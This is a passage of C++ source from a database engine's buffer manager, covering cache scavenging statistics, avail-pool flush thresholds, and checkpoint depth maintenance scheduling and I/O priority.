g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolHigh = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolHigh, statsCurrRun.cbfAvailPoolHigh );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolTarget = max( g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAvailPoolTarget, statsCurrRun.cbfAvailPoolTarget );
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfVisited += statsCurrRun.cbfVisited;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushed += statsCurrRun.cbfFlushed;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfEvictedAvailPool += statsCurrRun.cbfEvictedAvailPool;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfEvictedShrink += statsCurrRun.cbfEvictedShrink;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfShrinkFromAvailPool += statsCurrRun.cbfShrinkFromAvailPool;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPending += statsCurrRun.cbfFlushPending;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPendingSlow += statsCurrRun.cbfFlushPendingSlow;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFlushPendingHung += statsCurrRun.cbfFlushPendingHung;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFaultPending += statsCurrRun.cbfFaultPending;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfFaultPendingHung += statsCurrRun.cbfFaultPendingHung;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfOutOfMemory += statsCurrRun.cbfOutOfMemory;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfLatched += statsCurrRun.cbfLatched;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfDiskTilt += statsCurrRun.cbfDiskTilt;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfAbandoned += statsCurrRun.cbfAbandoned;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfDependent += statsCurrRun.cbfDependent;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfTouchTooRecent += statsCurrRun.cbfTouchTooRecent;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfPermanentErrs += statsCurrRun.cbfPermanentErrs;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].cbfHungIOs += statsCurrRun.cbfHungIOs;
g_rgScavengeTimeSeqCumulative[g_iScavengeTimeSeqLast].errRun = ( statsCurrRun.errRun < JET_errSuccess ) ? statsCurrRun.errRun : 0;
#endif
}
// Report progress in scavenging.
ETCacheScavengeProgress(
statsCurrRun.iRun,
statsCurrRun.cbfVisited,
statsCurrRun.cbfCacheSize,
statsCurrRun.cbfCacheTarget,
statsCurrRun.cbfCacheSizeStartShrink,
statsCurrRun.dtickShrinkDuration,
statsCurrRun.cbfAvail,
statsCurrRun.cbfAvailPoolLow,
statsCurrRun.cbfAvailPoolHigh,
statsCurrRun.cbfFlushPending,
statsCurrRun.cbfFlushPendingSlow,
statsCurrRun.cbfFlushPendingHung,
statsCurrRun.cbfOutOfMemory,
statsCurrRun.cbfPermanentErrs,
(INT)statsCurrRun.eStopReason,
statsCurrRun.errRun );
if ( errHang != JET_errSuccess )
{
OSTrace(
JET_tracetagBufferManagerMaintTasks,
OSFormat( "BF: ===== scan efficacy =========\r\n"
"BF: iRun = %I64d\r\n"
"BF: cbfVisited = %I32d\r\n"
"BF: cbfCacheSize = %I32d\r\n"
"BF: cbfCacheTarget = %I32d\r\n"
"BF: cbfCacheSizeStartShrink = %I32d\r\n"
"BF: dtickShrinkDuration = %I32u\r\n"
"BF: cbfAvail = %I32d\r\n"
"BF: cbfAvailPoolLow = %I32d\r\n"
"BF: cbfAvailPoolHigh = %I32d\r\n"
"BF: cbfFlushPending = %I32d\r\n"
"BF: cbfFlushPendingSlow = %I32d\r\n"
"BF: cbfFlushPendingHung = %I32d\r\n"
"BF: cbfOutOfMemory = %I32d\r\n"
"BF: cbfPermanentErrs = %I32d\r\n"
"BF: eStopReason = %d\r\n"
"BF: errRun = %d\r\n",
statsCurrRun.iRun,
statsCurrRun.cbfVisited,
statsCurrRun.cbfCacheSize,
statsCurrRun.cbfCacheTarget,
statsCurrRun.cbfCacheSizeStartShrink,
statsCurrRun.dtickShrinkDuration,
statsCurrRun.cbfAvail,
statsCurrRun.cbfAvailPoolLow,
statsCurrRun.cbfAvailPoolHigh,
statsCurrRun.cbfFlushPending,
statsCurrRun.cbfFlushPendingSlow,
statsCurrRun.cbfFlushPendingHung,
statsCurrRun.cbfOutOfMemory,
statsCurrRun.cbfPermanentErrs,
(INT)statsCurrRun.eStopReason,
statsCurrRun.errRun ) );
}
// If we did any shrink work, release the resizing critical section and attempt to
// release reserved memory.
//
if ( fOwnCacheResizeCritSec )
{
Assert( ( cbfCacheAddressableInitial != -1 ) && ( cbfCacheSizeInitial != -1 ) );
// Notify about cache size changes.
BFICacheINotifyCacheSizeChanges( cbfCacheAddressableInitial, cbfCacheSizeInitial, cbfCacheAddressable, cbfCacheSize );
// Deallocate as much as we can from the top of the cache.
BFICacheIShrinkAddressable();
g_critCacheSizeResize.Leave();
fOwnCacheResizeCritSec = fFalse;
}
// There are cases in which we may have finished earlier because of external setting of the next cache target,
// so force consumption of any potential new set point. Also, we may need to grow the cache due to the just-refreshed
// deadlock setting.
// The call to ErrBFIMaintCacheSizeRequest() is synchronous when it represents a growth in cache size (as should be the case for deadlock).
BFICacheSetTarget( OnDebug( cbfCacheDeadlock ) );
(void)ErrBFIMaintCacheSizeRequest();
// Reset deadlock protection if we've already grown the cache (thus releasing pages to the avail pool for waiters to consume).
if ( cbfCacheSize >= cbfCacheDeadlock )
{
cbfCacheDeadlock = 0;
}
// Restore cleanup checking.
FOSSetCleanupState( fCleanUpStateSaved );
return errHang;
}
// updates the avail pool thresholds
void BFIMaintAvailPoolUpdateThresholds( const LONG_PTR cbfCacheTargetOptimalNew )
{
// re-compute our avail pool thresholds
//
// - if the application only set the max cache size then we must interpret
// the thresholds relative to the default max cache size because we
// changed the default values from Win2k3/Ex2k3 and the application may
// have accidentally relied on their absolute values
//
// - if the application made an inconsistent set of changes to the max cache
// size and the thresholds (other than the above case) then we will force
// 1%/2% thresholds
//
// - otherwise, we will use the thresholds as specified
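// Illustrative example (hypothetical parameter values, not the actual defaults): if the default max cache
// size were 100000 buffers with default start/stop thresholds of 100/200 and cbfCacheTargetOptimalNew is
// 50000, the first case below would scale the thresholds to 50/100; an inconsistent combination of
// overrides would instead force the 1%/2% thresholds, i.e. 500/1000 for a 50000-buffer target.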
Assert( g_critCacheSizeSetTarget.FOwner() );
if ( !FDefaultParam( JET_paramCacheSizeMax ) &&
FDefaultParam( JET_paramStartFlushThreshold ) &&
FDefaultParam( JET_paramStopFlushThreshold ) )
{
cbfAvailPoolLow = LONG_PTR( QWORD( UlParam( JET_paramStartFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParamDefault( JET_paramCacheSizeMax ) );
cbfAvailPoolHigh = LONG_PTR( QWORD( UlParam( JET_paramStopFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParamDefault( JET_paramCacheSizeMax ) );
}
else if ( !( ( !FDefaultParam( JET_paramCacheSizeMax ) &&
!FDefaultParam( JET_paramStartFlushThreshold ) &&
!FDefaultParam( JET_paramStopFlushThreshold ) ) ||
( FDefaultParam( JET_paramCacheSizeMax ) &&
FDefaultParam( JET_paramStartFlushThreshold ) &&
FDefaultParam( JET_paramStopFlushThreshold ) ) ) )
{
cbfAvailPoolLow = cbfCacheTargetOptimalNew / 100;
cbfAvailPoolHigh = cbfCacheTargetOptimalNew / 50;
}
else
{
cbfAvailPoolLow = LONG_PTR( QWORD( UlParam( JET_paramStartFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParam( JET_paramCacheSizeMax ) );
cbfAvailPoolHigh = LONG_PTR( QWORD( UlParam( JET_paramStopFlushThreshold ) ) * cbfCacheTargetOptimalNew / UlParam( JET_paramCacheSizeMax ) );
}
// we never allow thresholds higher than 20%/25% because that will
// waste a horrible amount of memory due to the fact that we do not hold
// database page data in available buffers
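// For example, with cbfCacheTargetOptimalNew = 10000, the thresholds are capped at 2000 (20%) and 2500 (25%).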
if ( cbfAvailPoolLow > cbfCacheTargetOptimalNew / 5 )
{
cbfAvailPoolLow = cbfCacheTargetOptimalNew / 5;
}
if ( cbfAvailPoolHigh > cbfCacheTargetOptimalNew / 4 )
{
cbfAvailPoolHigh = cbfCacheTargetOptimalNew / 4;
}
if ( cbfCacheTargetOptimalNew > 0 )
{
// ensure that, no matter how low / messed up the params are above, if cache size is high
// enough, set to sane minimums of 0.1% and 0.2% FlushLow / FlushHigh values respectively.
if ( cbfCacheTargetOptimalNew > 10000 )
{
if ( cbfAvailPoolLow < ( cbfCacheTargetOptimalNew / 1000 ) )
{
cbfAvailPoolLow = ( cbfCacheTargetOptimalNew / 1000 );
}
if ( cbfAvailPoolHigh < ( cbfCacheTargetOptimalNew / 500 ) )
{
cbfAvailPoolHigh = ( cbfCacheTargetOptimalNew / 500 );
}
}
// ensure that, no matter how small cbfCacheTargetOptimalNew is, we still have valid limits
if ( cbfAvailPoolLow == cbfAvailPoolHigh )
{
cbfAvailPoolHigh += cbfCacheTargetOptimalNew / 100;
}
if ( cbfAvailPoolHigh == cbfCacheTargetOptimalNew )
{
cbfAvailPoolHigh = cbfCacheTargetOptimalNew - 1;
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolHigh = min( cbfCacheTargetOptimalNew - 1, cbfAvailPoolHigh + 1 );
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolLow = max( 1, cbfAvailPoolLow - 1 );
}
if ( cbfAvailPoolHigh - cbfAvailPoolLow < 1 )
{
cbfAvailPoolHigh = cbfAvailPoolLow;
}
}
else
{
// cbfCacheTargetOptimalNew of zero is not expected during regular buffer manager operation.
Assert( cbfCacheTargetOptimalNew == 0 );
Expected( fFalse );
cbfAvailPoolLow = 0;
cbfAvailPoolHigh = 0;
}
Assert( cbfAvailPoolLow >= 0 );
Assert( cbfAvailPoolHigh >= 0 );
Assert( cbfAvailPoolLow <= cbfAvailPoolHigh );
cbfAvailPoolTarget = ( cbfAvailPoolLow + cbfAvailPoolHigh + 1 ) / 2;
Assert( cbfAvailPoolTarget >= cbfAvailPoolLow );
Assert( cbfAvailPoolTarget <= cbfAvailPoolHigh );
}
void BFIMaintScavengeIReset()
{
g_iScavengeLastRun = 0;
memset( g_rgScavengeLastRuns, 0, g_cScavengeLastRuns * sizeof(g_rgScavengeLastRuns[ 0 ]) );
g_iScavengeTimeSeqLast = 0;
memset( g_rgScavengeTimeSeq, 0, g_cScavengeTimeSeq * sizeof(g_rgScavengeTimeSeq[ 0 ]) );
#ifndef RTM
memset( g_rgScavengeTimeSeqCumulative, 0, g_cScavengeTimeSeq * sizeof(g_rgScavengeTimeSeqCumulative[ 0 ]) );
#endif
}
ERR ErrBFIMaintScavengePreInit(
INT K,
double csecCorrelatedTouch,
double csecTimeout,
double csecUncertainty,
double dblHashLoadFactor,
double dblHashUniformity,
double dblSpeedSizeTradeoff )
{
Expected( K == 1 || K == 2 ); // anything else is essentially untested.
switch ( g_bflruk.ErrInit( K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff ) )
{
default:
AssertSz( fFalse, "Unexpected error initializing BF LRUK Manager" );
case BFLRUK::ERR::errOutOfMemory:
return ErrERRCheck( JET_errOutOfMemory );
case BFLRUK::ERR::errSuccess:
break;
}
BFITraceResMgrInit( K,
csecCorrelatedTouch,
csecTimeout,
csecUncertainty,
dblHashLoadFactor,
dblHashUniformity,
dblSpeedSizeTradeoff );
return JET_errSuccess;
}
ERR ErrBFIMaintScavengeInit( void )
{
ERR err = JET_errSuccess;
Assert( g_rgScavengeTimeSeq == NULL );
Assert( g_rgScavengeLastRuns == NULL );
Assert( g_rgScavengeTimeSeqCumulative == NULL );
// we'll base the number of scavenge stats records based on the most common
// cause for starvation, which is hung I/Os.
g_dtickMaintScavengeTimeout = (TICK)UlParam( JET_paramHungIOThreshold );
#ifdef DEBUG
g_cScavengeTimeSeq = ( 2 * g_dtickMaintScavengeTimeout ) / dtickMaintScavengeTimeSeqDelta + 3 /* extra runs to ensure we have over 2 x scavenge timeout */;
#else
g_cScavengeTimeSeq = g_dtickMaintScavengeTimeout / dtickMaintScavengeTimeSeqDelta + 2 /* extra runs to ensure we have over required scavenge timeout */;
#endif
// limit collection to between 10 and 100 samples.
g_cScavengeTimeSeq = UlpFunctionalMax( g_cScavengeTimeSeq, 10 );
g_cScavengeTimeSeq = UlpFunctionalMin( g_cScavengeTimeSeq, 100 );
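// Illustrative example (assuming the 500 ms sampling delta noted above and the default 30-second hung-I/O
// threshold): DEBUG computes ( 2 * 30000 ) / 500 + 3 = 123 entries, clamped to 100; RETAIL computes
// 30000 / 500 + 2 = 62 entries.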
Alloc( g_rgScavengeTimeSeq = new BFScavengeStats[ g_cScavengeTimeSeq ] );
Alloc( g_rgScavengeLastRuns = new BFScavengeStats[ g_cScavengeLastRuns ] );
#ifndef RTM
Alloc( g_rgScavengeTimeSeqCumulative = new BFScavengeStats[ g_cScavengeTimeSeq ] );
#endif
BFIMaintScavengeIReset();
HandleError:
if ( err < JET_errSuccess )
{
BFIMaintScavengeTerm();
}
return err;
}
void BFIMaintScavengeTerm( void )
{
#ifndef RTM
delete[] g_rgScavengeTimeSeqCumulative;
g_rgScavengeTimeSeqCumulative = NULL;
#endif
delete[] g_rgScavengeLastRuns;
g_rgScavengeLastRuns = NULL;
delete[] g_rgScavengeTimeSeq;
g_rgScavengeTimeSeq = NULL;
}
// Checkpoint Depth
CSemaphore g_semMaintCheckpointDepthRequest( CSyncBasicInfo( _T( "g_semMaintCheckpointDepthRequest" ) ) );
IFMP g_ifmpMaintCheckpointDepthStart;
ERR errLastCheckpointMaint = JET_errSuccess;
POSTIMERTASK g_posttBFIMaintCheckpointDepthITask = NULL;
#define dtickBFMaintNever 0xFFFFFFFF
// requests that checkpoint depth maintenance be performed on dirty pages in
// the cache
void BFIMaintCheckpointDepthRequest( FMP * pfmp, const BFCheckpointDepthMainReason eRequestReason )
{
// if we are asking to remove clean entries then skip all these checks and
// just try to schedule checkpoint depth maintenance
if ( eRequestReason != bfcpdmrRequestRemoveCleanEntries )
{
// make sure this is not already the checkpoint maintenance thread
// (otherwise, we will likely deadlock trying to obtain
// pfmp->RwlIBFContext())
if ( Ptls()->fCheckpoint )
{
return;
}
// ignore the request if we performed checkpoint depth maintenance recently
pfmp->EnterBFContextAsReader();
if ( eRequestReason == bfcpdmrRequestOB0Movement )
{
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( !pbffmp || !pbffmp->fCurrentlyAttached )
{
pfmp->LeaveBFContextAsReader();
return;
}
if ( TickCmp( TickOSTimeCurrent(), pbffmp->tickMaintCheckpointDepthNext ) < 0 )
{
pfmp->LeaveBFContextAsReader();
return;
}
}
else if ( eRequestReason == bfcpdmrRequestIOThreshold )
{
// Since the IO stack is global, we have to check globally whether we stopped
// because of this error.
if ( errLastCheckpointMaint != errDiskTilt )
{
pfmp->LeaveBFContextAsReader();
return;
}
// schedule immediately
// Ok, we did stop checkpoint advancement due to too much IO, restart it
// immediately. We don't need to do all IFMPs as they will restart in 10ms
// (dtickMaintCheckpointDepthRetry).
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent();
}
}
else if ( eRequestReason == bfcpdmrRequestConsumeSettings )
{
// schedule immediately
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent();
}
}
else
{
AssertSz( fFalse, "Unknown reason (%d) for CP depth maintenance.", eRequestReason );
}
pfmp->LeaveBFContextAsReader();
}
// try to acquire the right to request checkpoint depth maintenance
BOOL fAcquiredAsync = g_semMaintCheckpointDepthRequest.FTryAcquire();
// if we acquired the right to maintain our checkpoint depth, then we will
// try to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain our checkpoint depth
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "Scheduling BFIMaintCheckpointDepthITask immediately (%d).", eRequestReason ) );
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointDepthITask, NULL, 0, 0 ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointDepthRequest.CAvail() == 0 );
g_semMaintCheckpointDepthRequest.Release();
}
}
// executes an async request to perform checkpoint depth maintenance
void BFIMaintCheckpointDepthITask( void*, void* )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our checkpoint depth
TICK dtickNextSchedule = 0;
BFIMaintCheckpointDepthIFlushPages( &dtickNextSchedule );
// remember the time when we last maintained the checkpoint depth
// if we have not completed our maintenance of the checkpoint depth then
// try to schedule another attempt in the near future
if ( dtickNextSchedule != dtickBFMaintNever )
{
Assert( dtickNextSchedule <= 60000 ); // should be at most 1 minute
#ifdef BF_REALTIME_CHECKPOINT_RESCHEDULING
const TICK dtickNextScheduleActual = dtickNextSchedule;
#else
const TICK dtickNextScheduleActual = dtickMaintCheckpointDepthRetry;
#endif
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Scheduling BFIMaintCheckpointDepthITask for %u ticks in future (next estimated is in %u ticks).", dtickNextScheduleActual, dtickNextSchedule ) );
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointDepthITask,
NULL,
dtickNextScheduleActual,
0 ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointDepthRequest.CAvail() == 0 );
g_semMaintCheckpointDepthRequest.Release();
}
}
// tries to flush all pages that are impeding the checkpoint
void BFIMaintCheckpointDepthIFlushPages( TICK * pdtickNextSchedule )
{
ERR err = JET_errSuccess;
CBFIssueList bfil;
const IFMP ifmpMin = FMP::IfmpMinInUse();
const IFMP ifmpMac = FMP::IfmpMacInUse();
IFMP ifmpStart = g_ifmpMaintCheckpointDepthStart;
IFMP ifmp;
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Beginning Checkpoint Depth Maint at ifmpStart=0x%x (ifmpMin=0x%x, g_ifmpMax=0x%x)",
(ULONG)ifmpStart, (ULONG)ifmpMin, (ULONG)ifmpMac ) );
Assert( pdtickNextSchedule );
*pdtickNextSchedule = dtickBFMaintNever;
if ( ifmpMin > ifmpMac )
{
// if there are no active databases then we must be done
//
*pdtickNextSchedule = dtickBFMaintNever;
return;
}
// NOTE: we took a snapshot of ifmpMin/MacInUse because it could be
// being updated even as we're checking. However, exactly when we take
// the snapshot shouldn't really matter because the start/stop ifmps are
// just optimisations to prevent us from scanning the entire FMP
// array, so in the worst case, we'll either just scan extra FMPs
// only to find that there's nothing to be done or we'll end up
// skipping some FMPs, but we'll just get those the next time
// around
// ensure starting FMP is in range
//
if ( ifmpStart < ifmpMin || ifmpStart > ifmpMac )
{
ifmpStart = ifmpMin;
}
// Set the TLS flag to indicate IOs are for checkpoint
Assert( !Ptls()->fCheckpoint );
Ptls()->fCheckpoint = fTrue;
// scan all active databases
//
ifmp = ifmpStart;
do
{
Assert( ifmp >= ifmpMin );
Assert( ifmp <= ifmpMac );
// if this database doesn't have a BF FMP context then try to give it
// one so that we have a chance to attempt checkpoint advancement. we
// need to do this even if no pages are cached to give the flush map a
// chance to be advanced
FMP * pfmp = &g_rgfmp[ifmp];
if ( !pfmp->FBFContext() )
{
FMP::EnterFMPPoolAsWriter();
pfmp->RwlDetaching().EnterAsReader();
if ( pfmp->FAttached() && !pfmp->FDetachingDB() && !pfmp->FBFContext() )
{
(VOID)ErrBFISetupBFFMPContext( ifmp );
}
pfmp->RwlDetaching().LeaveAsReader();
FMP::LeaveFMPPoolAsWriter();
}
// maintain the checkpoint depth for this IFMP
//
pfmp->EnterBFContextAsReader();
BFFMPContext* pbffmp = (BFFMPContext*)pfmp->DwBFContext();
err = JET_errSuccess;
BOOL fUpdateCheckpoint = fFalse;
size_t ipinstCheckpointUpdate = INT_MAX;
if ( pbffmp && pbffmp->fCurrentlyAttached )
{
const TICK tickNow = TickOSTimeCurrent();
const TICK tickNextMaint = pbffmp->tickMaintCheckpointDepthNext;
const LONG dtickNextMaint = DtickDelta( tickNow, tickNextMaint );
if ( dtickNextMaint <= 0 )
{
// It's come time to do checkpoint depth maint for this FMP ...
if ( g_rgfmp[ ifmp ].DwBFContext() )
{
err = ErrBFIMaintCheckpointDepthIFlushPagesByIFMP( ifmp, &fUpdateCheckpoint );
if ( err != JET_errSuccess )
{
// In theory we could instead of rescheduling rely on the IO completions to trigger
// more checkpoint depth maint, but I'm nervous about that. Also today it is at least
// a little unsafe as we only FTryAcquire to schedule this. It might be an OK job
// though to increase the dtickMaintCheckpointDepthRetry from 10 to say 50?
*pdtickNextSchedule = dtickMaintCheckpointDepthRetry;
// but we allow immediate resched as soon as IOs complete ...
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent() + dtickMaintCheckpointDepthRetry;
}
else
{
// We finished for now, schedule soon
pbffmp->tickMaintCheckpointDepthNext = TickOSTimeCurrent() + dtickMaintCheckpointDepthDelay;
}
}
pbffmp->tickMaintCheckpointDepthLast = TickOSTimeCurrent();
}
else
{
// This FMP isn't ready for checkpoint maintenance.
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "CP: Skipping due to time not yet elapsed (%u >= %u).",
tickNextMaint, tickNow ) );
#ifdef BF_REALTIME_CHECKPOINT_RESCHEDULING
// If the final next scheduled delta is greater than the current FMP's next schedule, we
// must reduce our final next scheduled delta to this value, so we don't accidentally quiesce
// checkpoint maintenance without maintaining this FMP.
if ( ( *pdtickNextSchedule == dtickBFMaintNever ) || ( dtickNextMaint < (LONG)( *pdtickNextSchedule ) ) )
{
const TICK dtickNextScheduleOld = *pdtickNextSchedule;
*pdtickNextSchedule = (TICK)dtickNextMaint;
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "CP: Changing dtickNextSchedule schedule from %u to %u.",
dtickNextScheduleOld, *pdtickNextSchedule ) );
}
#endif
}
// capture the inst we need to update the checkpoint for
ipinstCheckpointUpdate = IpinstFromPinst( PinstFromIfmp( ifmp ) );
Assert( PinstFromIfmp( ifmp ) == g_rgpinst[ipinstCheckpointUpdate] ); // just to make sure
}
pfmp->LeaveBFContextAsReader();
Assert( !fUpdateCheckpoint || ipinstCheckpointUpdate != INT_MAX );
if ( fUpdateCheckpoint )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, "CPUPD: Triggering checkpoint update from checkpoint maintenance." );
BFIMaintCheckpointIUpdateInst( ipinstCheckpointUpdate );
}
if ( err == errDiskTilt )
{
// Setting this allows the BFIMaintCheckpointDepthRequest() to ignore
// the next schedule time and just immediately ask for more checkpoint
// depth maint.
errLastCheckpointMaint = err;
break;
}
// advance to next ifmp for the next iteration of the loop,
// properly handling wraparound
//
ifmp++;
if ( ifmp > ifmpMac )
{
ifmp = ifmpMin;
}
}
while ( ifmp != ifmpStart );
// to make an intelligent decision and modify the pbffmp CP scheduling data
// we must own the request semaphore.
// Assert( g_semMaintCheckpointDepthRequest.FOwner() );
if ( err == errDiskTilt )
{
// if there are excessive I/O's pending, since we queue dirty pages in
// ascending IFMP order, we may not have been able to flush dirty pages
// for higher-numbered IFMP's (and which subsequently ends up holding back
// checkpoint advancement), so to ensure the checkpoint doesn't get bogged
// down by a lot of activity on one database, start on the next IFMP the
// next time around
//
g_ifmpMaintCheckpointDepthStart = ifmp + 1;
}
else
{
// we didn't find a lot of pages to queue for I/O, so next time around,
// it's safe to start at the first IFMP without worrying that dirty pages
// belonging to higher-numbered IFMP's got skipped
//
g_ifmpMaintCheckpointDepthStart = 0;
}
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "Next Checkpoint Depth Maint will begin at g_ifmpMaintCheckpointDepthStart=0x%x in %u ms",
(ULONG)g_ifmpMaintCheckpointDepthStart,
*pdtickNextSchedule ) );
// issue any queued writes and log flushes
(void)bfil.ErrIssue();
// Reset the TLS flag to indicate IOs are NOT for checkpoint
Ptls()->fCheckpoint = fFalse;
Assert( *pdtickNextSchedule == dtickBFMaintNever || *pdtickNextSchedule < INT_MAX ); // something went wrong w/ my math ...
}
// This function distills the latency of the current checkpoint against the target checkpoint
// into a IO QOS / priority of background or urgent background level between 1 and 127.
// Global used to size the buckets for knowing when to raise the checkpoint IO priority
//
// Note: This choice of 512 KB makes it so we reach our maximum aggressiveness within 63.5 MB
// of extra checkpoint depth... I find this reasonable.
const static ULONG g_cbCheckpointInterval = 512 * 1024;
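// (Illustrative arithmetic for the note above: with urgent levels capped at 127 and one level
//  per 512 KB of overdue checkpoint, 127 * 512 KB == 63.5 MB of extra depth before we max out.)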
// We could probably reduce g_cbCheckpointInterval, but I picked a value that is high enough
// that we wouldn't grow a level more aggressive while within an OB0 bucket uncertainty, even
// on a disk with 4KB sector sizes. This means each level of aggressiveness is represented
// by a discernible amount of checkpoint behindness...
C_ASSERT( g_cbCheckpointInterval >= cbCheckpointTooDeepUncertainty );
INT IUrgentBFIMaintCheckpointPriority(
__in const LOG * const plog,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
__in const LGPOS lgposOldestBegin0 ) // no-ref, force copying as this happens w/o latch
{
INT iUrgentLevel;
Assert( 0 != CmpLgpos( lgposMin, lgposNewest ) );
Assert( 0 != CmpLgpos( lgposMin, lgposOldestBegin0 ) );
// Get the current behind-ness of this buffer
const QWORD cbCurrentCheckpoint = plog->CbLGOffsetLgposForOB0( lgposNewest, lgposOldestBegin0 );
// At 1.25x the checkpoint we start pushing more urgently / harder
// Cap urgent limit at log file size if checkpointDepth is 0
const QWORD cbUrgentCheckpoint = cbCheckpointDepth > 0 ?
cbCheckpointDepth + cbCheckpointDepth / 4 :
plog->CbLGSec() * plog->CSecLGFile();
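// (e.g., illustrative: with a 20 MB desired checkpoint depth, urgency kicks in once the current
//  depth exceeds 25 MB; with a depth of 0, the threshold is a single log file's worth.)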
Assert( cbCheckpointDepth <= cbUrgentCheckpoint );
// Calculate the priority of this BF IO ...
if ( cbCurrentCheckpoint < cbUrgentCheckpoint )
{
// We are keeping reasonably on top, regular background flush ...
iUrgentLevel = 0; // meaning qosIODispatchBackground
}
else
{
// We have fallen behind on checkpoint advancement, push more pressingly ...
// calculate a level of aggressiveness ...
const QWORD cbCheckpointOverdue = cbCurrentCheckpoint - cbUrgentCheckpoint;
iUrgentLevel = (INT)( cbCheckpointOverdue / g_cbCheckpointInterval + 1 );
iUrgentLevel = UlBound( iUrgentLevel, qosIODispatchUrgentBackgroundLevelMin, qosIODispatchUrgentBackgroundLevelMax );
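// (e.g., illustrative, continuing the 20 MB example above: a current depth of 30 MB is 5 MB
//  overdue, giving 5 MB / 512 KB + 1 == 11 as the urgent level before bounding.)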
}
return iUrgentLevel;
}
OSFILEQOS QosBFIMaintCheckpointPriority(
__in const INST * const pinst,
__in const LGPOS& lgposNewest,
__in const QWORD cbCheckpointDepth,
__in const LGPOS lgposOldestBegin0 ) // no-ref, force copying as this happens w/o latch
{
OSFILEQOS qosIO;
Assert( 0 != CmpLgpos( lgposMin, lgposNewest ) );
Assert( 0 != CmpLgpos( lgposMin, lgposOldestBegin0 ) );
const INT iUrgentLevel = IUrgentBFIMaintCheckpointPriority( pinst->m_plog, lgposNewest, cbCheckpointDepth, lgposOldestBegin0 );
if ( 0 == iUrgentLevel )
{
// It is not urgent, meaning background ...
qosIO = qosIODispatchBackground;
}
else
{
// Urgent, convert the relative urgency into a QOS for the OS File APIs ...
qosIO = QosOSFileFromUrgentLevel( iUrgentLevel );
}
if ( JET_IOPriorityLowForCheckpoint & UlParam( pinst, JET_paramIOPriority ) )
{
qosIO |= qosIOOSLowPriority;
}
return qosIO;
}
OSFILEQOS QosBFIMaintCheckpointQuiescePriority()
{
OSFILEQOS qosIO;
const ULONG_PTR cioMax = UlParam( JET_paramOutstandingIOMax );
if ( cioMax > 256 )
{
// Note: We can choose such aggressive outstanding IO levels because below
// we are also adding the OS-level low priority flag, so in theory all such
// IO should not be able to drown out the disk with IO.
qosIO = QosOSFileFromUrgentLevel( 25 ); // 11 - 23 (@1024) IOs outstanding
}
else if ( cioMax <= 32 )
{
qosIO = QosOSFileFromUrgentLevel( 64 ); // 4 - 9 IOs outstanding
}
else if ( cioMax <= 64 )
{
qosIO = QosOSFileFromUrgentLevel( 50 ); // ? - 10 IOs outstanding
}
else if ( cioMax <= 128 )
{
qosIO = QosOSFileFromUrgentLevel( 38 ); // ? - 10 IOs outstanding
}
else if ( cioMax <= 256 )
{
